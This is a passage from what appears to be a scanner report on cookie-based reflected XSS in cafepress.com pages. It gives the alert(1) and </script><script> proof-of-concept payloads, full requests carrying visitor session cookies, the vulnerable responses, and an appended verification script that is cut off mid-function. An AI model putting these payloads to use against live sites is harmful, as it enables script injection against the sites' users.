Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=197e0</script><script>alert(1)</script>ccc939a9ef5; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 51195
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
afepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx'
window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/birth-announcements

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1c6c"-alert(1)-"3104c288fc9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 54488
Date: Sun, 26 Dec 2010 13:48:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/birth-announcements

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b100</script><script>alert(1)</script>01efe3e9555 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7b100</script><script>alert(1)</script>01efe3e9555; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 54510
Date: Sun, 26 Dec 2010 13:48:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '7b100</script><script>alert(1)</script>01efe3e9555'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-baby-gear

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505c2"-alert(1)-"362de5625b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 71179
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-baby-gear

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8caa8</script><script>alert(1)</script>49b69bc8c1b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8caa8</script><script>alert(1)</script>49b69bc8c1b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 71207
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '8caa8</script><script>alert(1)</script>49b69bc8c1b'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-buttons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c3"-alert(1)-"5c9b7d83b0c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, however, that the responses in this report set their cookies with domain=cafepress.com and are served over plain HTTP: a script running on any cafepress.com subdomain, or anyone able to inject into an unencrypted response, can set a cp-v or cp_st cookie for the parent domain and so reach this reflection.
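An added check, not part of the XSS.CX report or of CafePress's code, for re-verifying the "echoed unmodified" claim made in findings 1.94 through 1.100 above against a saved response rather than trusting the scanner: it finds the canary between its random prefix and suffix, compares what came back with what was sent, and works out whether the echo sits inside a <script> block and inside an open string literal. The response body is constructed here from the viewcart.aspx snippet above, the "fixed" variant is hypothetical, and the context classifier assumes no JavaScript comments or regular-expression literals precede the reflection point (true of these responses).

```javascript
// Added example (not from the report): confirm that a cookie reflection lands
// inside a <script> string literal and survived unencoded.

// Burp-style canary: random prefix + payload + random suffix. The prefix and
// suffix locate the echo; comparing the middle with the payload shows which
// characters the application let through.
const CANARY = {
  prefix: '197e0',
  payload: '</script><script>alert(1)</script>',
  suffix: 'ccc939a9ef5',
};

// Constructed response body, cut down from the viewcart.aspx response above.
const SAMPLE_RESPONSE = [
  '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">',
  '<html><head><script type="text/javascript">',
  'window.cafepress.tealeaf = {};',
  "window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx'",
  "window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5'",
  "window.cafepress.tealeaf.salesChannel = 'Other'",
  '</script></head><body></body></html>',
].join('\n');

// Same page after a hypothetical fix that \u-escapes angle brackets:
// the canary is still echoed, but no longer unmodified.
const FIXED_RESPONSE = SAMPLE_RESPONSE.replace(
  CANARY.payload,
  CANARY.payload.replace(/</g, '\\u003c').replace(/>/g, '\\u003e'),
);

// Where does `index` sit: in HTML text, in a <script> block, or inside an
// unclosed '...' / "..." literal within that block? Only text before the
// reflection point is inspected, so the payload cannot confuse the result.
// Simplification (assumption): JS comments and regex literals are ignored.
function classifyContext(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const open = lower.lastIndexOf('<script');
  const close = lower.lastIndexOf('</script');
  if (open === -1 || close > open) return { region: 'html', stringDelimiter: null };
  const js = before.slice(before.indexOf('>', open) + 1);
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote === null) {
      if (c === '"' || c === "'") quote = c;
    } else if (c === '\\') {
      i++; // skip the escaped character
    } else if (c === quote) {
      quote = null;
    }
  }
  return { region: 'script', stringDelimiter: quote };
}

// Every place the canary was echoed, with what came back and where it landed.
function findReflections(body, { prefix, payload, suffix }) {
  const hits = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start === -1) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end === -1) break;
    const echoed = body.slice(start + prefix.length, end);
    hits.push({ index: start, echoed, unmodified: echoed === payload, ...classifyContext(body, start) });
    from = end + suffix.length;
  }
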